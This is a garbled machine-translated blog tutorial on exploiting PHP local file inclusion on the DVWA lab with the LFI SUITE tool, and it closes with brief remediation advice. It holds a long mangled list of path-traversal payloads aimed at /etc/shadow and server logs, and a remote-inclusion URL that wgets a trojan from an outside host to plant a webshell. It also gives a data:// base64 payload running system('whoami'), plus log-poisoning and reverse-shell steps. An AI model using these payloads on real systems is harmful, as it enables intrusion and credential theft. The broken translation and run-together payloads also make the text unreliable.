Shulou(Shulou.com)06/01 Report--

Today, I saw a utilization tool contained in a local file in the official account. I watched a video of foreign Daniel using the tool. I felt very powerful. Through this tool, the site with local file containing vulnerabilities can be exploited and a LFI shell can be returned. Through the returned LFI shell, a reverse connection can be obtained again, thus the relevant commands can be executed. In the past, the use of local files mostly stayed in reading files. You can getshell if a remote file is included. This article is mainly a brief introduction and use of local files, mainly the use of tools, but also to record the process, easy to check later, and then take the time to study the source code! God, please make a detour! :)

The 0x01 file contains the principle of vulnerability

File inclusion vulnerabilities are mainly caused by programmers writing some common code in a separate file and then using other files to make include calls. If the files that need to be included are hard-coded, there are generally no security problems, but sometimes they may not be sure which specific files need to be included, so they will use variables to transfer the files that need to be included. However, in the process of using the include file, the included variables are not checked and filtered, resulting in the malicious data submitted externally into the file inclusion process as variables, resulting in the execution of the submitted malicious data. File inclusions are usually divided into local file inclusions (Local File Inclusion) and remote file inclusions (Remote File Inclusion). When allow_url_fopen and allow_url_include are 0n, remote files contain vulnerabilities, allow_url_fopen is off and allow_url_include is 0n, local files contain vulnerabilities, as shown in the configuration file in figure 1. This time it is mainly included in local files, so allow_url_fopen is set to off.

Figure 1 php.ini configuration

In addition, the files containing vulnerabilities mainly involve four dangerous functions: include (), require () and include_once (), require_once ().

Include (): the file is not included until the include is executed, only a warning is generated when the included file is not found, and the script will continue to execute.

Require (): as long as the program contains the file as soon as it is run, a fatal error occurs when the included file is not found, and the script is stopped.

Include_once () and require_once (): if the code in the file is already included, it will not be included again. (from the brief book)

The 0x02 file contains vulnerability compromise

Through the file containing vulnerabilities, you can read sensitive files and source code files in the system, such as password files. By violently cracking the password files, you can obtain the user account of the operating system if the password file is cracked successfully. Even through the open remote connection service for connection control; in addition, file containing vulnerabilities may also lead to the execution of arbitrary code, regardless of whether the local file contains or the remote file contains!

In short, there are three common ways to make use of it:

First, read other files on the target host, mainly local files.

Second, contains runnable web pages *, mainly remote files, provided that "allow_url_fopen" is activated (the default is active, few people will modify it).

Third, include a corresponding code file to create a file, because the shell obtained through the file containing vulnerabilities is not long-lasting, if this vulnerability is fixed, then shell no longer exists, so you need to create a real shell. We can first include a pseudo shell that can execute cmd, and then use wget plus the-O parameter (similar to:

Http://x.x.x.x/index.php?page=http://www.1ster.cn/cmd.txt?cmd=wgethttp://x.x.x.x/muma.txt-O muma.php) to get a real webshell. If there is no wget command in the system and the get directory is not writable, then we can include a script to create the file, and then upload the * * file through the script.

In fact, in addition to the above three points, there should be another point is to carry out arbitrary orders!

0x03 experimental environment

This experimental environment is mainly demonstrated by using the dvwa platform, as shown in figure 2. DVWA (Damn Vulnerable Web Application) is a set of web vulnerability platform written in PHP+mysql. To put it simply, it is the so-called website vulnerability target. The platform contains some common web security vulnerabilities such as SQL injection, XSS, local file inclusion, command execution and so on. The platform is open source and can be downloaded directly from the official website.

Figure 2 dvwa platform

The 0x04 local file contains the use of tools

This time, we mainly use the LFI SUIT local file inclusion tool, which is an artifact written in python2.7, which is suitable for Windows,Linux and OS X, and automatically configures and installs the required modules for the first time. The tool provides nine different file containing modules, as shown in figure 3. In addition, when you get a LFI shell through an available * *, you can easily get a reverse shell by typing the "reverseshell" command. But only if you have your system listen for reverse connections, such as using "nc-lvp port".

Figure 3 Nine different files contain * modules

0x05 local files contain read files

In the previous local file containing vulnerabilities, most of them read files, such as password files under linux (.. / etc/shadow and.. / etc/passwd), to get and read some files that you know the physical path, as shown in figure 4.

Figure 4 read the file under the known path

Here are some simple test cases that can be modified according to the actual situation. The directory of the artifact also contains a lot of test cases, which can be viewed by yourself!

.. /.. / tomcat/conf/tomcat-users.xml../%2e%2e%2f whichtranslates to.. /% 2e%2e/ whichtranslates to.. /..% 2f whichtranslates to.. /% 2e%2e%5c whichtranslates to..\% C1% c0% 9v% c0% af.% 5c.. /.. / etc/hosts../../boot.ini/../../%2A../etc/passwd../.. /.. /.. / etc/passwd../etc/shadow../etc/shadow/../. . /.. / etc/ passwd ^ /.. / etc/ shadow^ /.. / etc/passwd/../etc / shadow/./etc/passwd/./etc/shadow\..\ etc\ passwd\..\ etc \ shadow..\ etc\ passwd..\ etc\ shadow/..\.. /..\.. / etc/passwd/..\.. /..\.. / etc/shadow. /.\. / etc/passwd. /.\. / etc/shadow\.. .\..\ etc\ passwd\..\ etc\ shadow..\ etc\ passwd..\ etc\ shadow%0a/bin/cat%20/etc/passwd % 0a/bin/cat%20/etc/shadow/etc/passwd/etc/shadow../../etc/passwd../../etc/shadow/../etc/passwd.jpg/../../ .. / etc/passwd.html/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0% Af../..%c0%af../etc/shadow/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e / etc/shadow%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c../%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25% 5c.% 25% 5c.% 25% 5c.% 25% 5c.% 25% 5c.% 25% 5c.% 25% 5c.% 25% 5c.% 25% 5c.% 25% 5c.% 25% 5c.% 25% 5c.% 25% 5c.% 25% 5c.% 25% 5c.% 25% 5c.% 25% 5c.% 25% 5c.% 25% 5c..% 25% 5c.% 25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%255cboot.ini/%25%5c..%25%5c..%25 % 5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini\\ & apos / bin/cat%20/etc/passwd\\ & apos;\ & apos;/bin/cat%20/etc/shadow\\ & apos .. /.. / conf/server.xml/../../bin/id | C:/inetpub/wwwroot/global.asaC:\ inetpub\ wwwroot\ global.asaC:/boot.iniC:\ boot.ini../.. / localstart.asp../localstart.asp../boot.ini../boot. Ini/./boot.ini/../boot.ini/../boot.ini/..\.. / ..\.. / boot.ini/.\. /.\\. / boot.ini\..\ boot.ini..\ boot .ini..\ boot.ini/../boot.ini.html/../boot.ini.jpg/.../.. . /..% c0% af.swap.% c0% af.racket.% c0% af.pact.% c0% af..% c0% af..% c0% af.% c0% af.. the boot.inipact% 2e, 2e, 2e, 2e, 2e, 2e, 2e, 2e, 2e, 2e, 2e, 2e, 2e, 2e, 2e, etc. 2e/bo../var/log/httpd/access_log../var/log/httpd/error_log../apache/logs/error.log../apache/logs/access.log../../apache/logs/error.log../../ Apache/logs/access.log../apache/logs/error.log../apache/logs/access.log../etc/httpd/logs/acces_log../etc/httpd/logs/acces.log../ .. / etc/httpd/logs/error_log../etc/httpd/logs/error.log../var/www/logs/access_log../../ .. /.. / var/www/logs/access.log../usr/local/apache/logs/access_log../usr/local/apache/logs/access.log../.. /.. /.. / var/log/apache/access_log../var/log/apache/access.log../var/log/access_log../. . /.. /.. / var/www/logs/error_log../var/www/logs/error.log../usr/local/apache/logs/error_log../.. /.. /.. / usr/local/apache/logs/error.log../var/log/apache/error_log../var/log/apache/error.log../ .. /.. / var/log/access_log../var/log/error_log/var/log/httpd/access_log / var/log/httpd/error_log.. / apache/logs/error.log.. / apache/logs/access.log../../apache/logs/error .log.. /.. / apache/logs/access.log../apache/logs/error.log../apache/logs/access.log/etc/httpd/logs/acces_log/etc/httpd/logs/acces.log/etc/httpd/logs/error_log/etc/httpd/logs/error.log/var/www/logs/access_log/var/www/logs/access.log/usr/local/apache/logs/access_log/ Usr/local/apache/logs/access.log/var/log/apache/access_log/var/log/apache/access.log/var/log/access_log/var/www/logs/error_log/var/www/logs/error.log/usr/local/apache/logs/error_log/usr/local/apache/logs/error.log/var/log/apache/error_log/var/log/apache/error.log/var/log/access_log/var/log/error_log. . /.. / WEB-INF/web.xml0x06 artifact simply get LFI shell to run the LFI SUIT tool and select the * module

Use pythonlfisuite.py directly, as shown in figure 5. At this time, we choose to use functional module 1.

Figure 5 running the local file contains the use of tools

Set up cookie

After we choose to take advantage of functional module 1, we will be prompted to enter cookie, as shown in figure 6:

Figure 6 setting up cookie

Get cookie

The browser F12console can get the current cookie by typing [xss_clean], as shown in figure 7.

Figure 7 get cookie

Successfully obtained LFI shell

After entering cookie, we randomly select a * * module to try. Here we select 3. After selecting the * * module, we enter the vulnerability address to successfully obtain a shell, as shown in figure 8.

Figure 8 successful acquisition of LFI shell

0x07 automatic module acquires lfi shell

If we don't know which module can return shell, we can choose the automatic module.

Figure 9 automatic * module

After selecting, we need to select a file that contains the path, and we can select a file in the current directory.

Figure 10 Select a file

After selecting a file, the tool tries the path of the possibility and takes advantage of it.

Figure 11 Select a file

As shown in figure 12, we successfully obtained a shell.

Figure 12 successful acquisition of shell

0x08 gets a reverse connection

After we have obtained the lfishell, we can use reverseshell to obtain a reverse connection, and we first listen for the reverse connection, as shown in figure 13.

Figure 13 sets the listening reverse connection

After we enter reverseshell, we can set ip.

Figure 14 setting ip and port

At this point, we also successfully obtained a reverse connection, as shown in figure 15.

Figure 15 get the reverse connection

0x09 scanning module

In addition, we can also use the scan module first, and then we can successfully obtain the LFI shell by selecting the corresponding * * module. The method of use is the same as above, and it will not be described again.

Brief introduction of 0x10 * module

Here is mainly the use of some functions of PHP and pseudo-protocol, by looking at the PHP help documentation to reproduce these modules, there are some differences with the use of source code, reference documentation. Due to the limited capacity, two of the modules failed completely, / proc/self/fd and phpinfo module, saw that the source code should use an injection of phpinfo to upload a code containing PHP, so as to implement, but did not make use of successfully. The programming level is too poor, who can save me!

/ proc/self/environ

Check to see if the / proc/self/environ file can be included by visiting http://127.0.0.1/vulnerabilities/fi/?page=../../../../../../../../proc/self/environ. If the environment variable information is returned, it can be accessed. If the return is empty, it is generally inaccessible. After judging that it can be accessed, then inject PHP code (such as) into the User-Agent header for *. If the code is successfully injected into the User-Agent header, your PHP code will be executed by reloading the environment variables. Because the access to the file cannot be added, the reproduction is not successful, and the host is linux!

Php://filter

Php://filter is a unique protocol flow in the PHP language, and its function is to handle other streams as an "intermediate stream", so we can execute PHP code in conjunction with php://input (see below), as shown in figure 16, and also input the result after execution with base64 encoding, as shown in figure 17.

Figure 16 php://filter executes PHP code

Figure 17 php://filter executes PHP code base64 output

Php://input

By using php://input and then entering the PHP code, you can then proceed with the PHP code that contains the input, as shown in figure 18, or you can wget a * * file through the PHP code to get a webshell. But to use this module, you must turn on the function including url!

Figure 18 php://input executes PHP code

/ proc/self/fd

Do not know how to use, if Daniel passes by, please give me a lot of advice!

Access_log

Here, we mainly use the log file, the get request and User-Agent we visit will be recorded in the log, and then we can construct a sentence to access it, as shown in figure 19, or you can write it in User-Agent. By connecting to the log file, you can get a sentence and execute the PHP code, as shown in figure 20. But here you need to ensure that you have access to the log file and know the strength of the log file, otherwise you will not succeed. You can include the log file first to see if there is any content. If there is no content, it is generally inaccessible!

Figure 19 write the PHP code to the log

Figure 20 contains a log file containing PHP code

Phpinfo

By looking at the source code, as if through phpinfo injection, falsely submit a file containing PHP code, so as to execute the PHP code, the next attempt is still unsuccessful, hey, there is time to continue to study, if you know passing by, please give me a lot of advice!

Data://

The main thing here is to print the content using data://, encrypt it using base64, such as base64 encoding, as shown in figure 21, and then use data:// to include the PHP code, so that data://text/plain;base64,PD9waHAgc3lzdGVtKCd3aG9hbWknKTs/Pg==, can execute the PHP code, as shown in figure 22. For details, please click here.

Figure 21 base64 coding of PHP code

Figure 22 execute PHP code

Expect://

Expect:// is mainly used to deal with interactive streams. The data flow PTY opened by expect:// encapsulation protocol provides access to process stdio, stdout and stderr. The encapsulation protocol is not enabled by default. In order to use the expect:// wrapper, you must install the Expect extension on PECL. Due to some reasons, this module did not reproduce successfully, and the encapsulation protocol is not enabled by default, so it does not take the time to reproduce! Please refer to the details.

Summary and repair of 0x11

This article mainly makes a simple introduction to the file inclusion, such as the simple principle and harm of the file containing vulnerabilities, and the most important thing is the further exploitation of the local files containing vulnerabilities, through the local files containing vulnerabilities, so as to get a reverse connection or LFI shell. Through this article also let oneself to the local file contains the harm and the use has the certain improvement, is no longer only stays in reads the file!

Through the exploitation of this vulnerability, the safest thing is to set allow_url_fopen and allow_url_include to 0ff, so that the vulnerability can not be exploited. On the other hand, we can limit the whitelist, which is equivalent to hard coding, and fix the files that need to be included directly, which will neither affect the business nor be easily exploited. Secondly, we should be skeptical of the user's input. Strictly check and filter the user's input variables!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.